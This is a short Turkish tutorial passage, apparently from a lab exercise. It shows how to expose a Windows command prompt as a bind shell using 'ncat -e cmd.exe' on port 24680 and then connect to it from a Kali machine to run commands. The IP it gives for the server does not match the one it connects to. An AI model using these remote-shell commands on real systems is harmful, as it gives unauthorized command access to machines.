Kali bilgisayarlarda ncat aracı varsayılan olarak bulunmaktadır. Bunun yanında, Windows bilgisayar için ncat aracı Nmap sayfasından (http://nmap.org/ncat/) indirilebilir.
Windows bilgisayarın komut satırının belirli bir porttan (TCP\24680) hizmete açılması aşağıdaki gibidir.
whoami
ncat.exe -lkvvnp 24680 -e cmd.exe
Kali istemci bilgisayarından Windows sunucu bilgisayarının (192.168.234.129) açılan portu üzerinden komut satırına erişim aşağıdaki gibidir. Erişim sağlandıktan sonra, Windows sunucunun komut satırındaymış gibi komutlar çalıştırılabilir.
ncat 192.168.234.131 24680
whoami
Böylece, Windows sunucu bilgisayarında doğrudan (bind) bir bağlantının oluştuğu ve “cmd.exe” komutunun çalıştığı görülmektedir.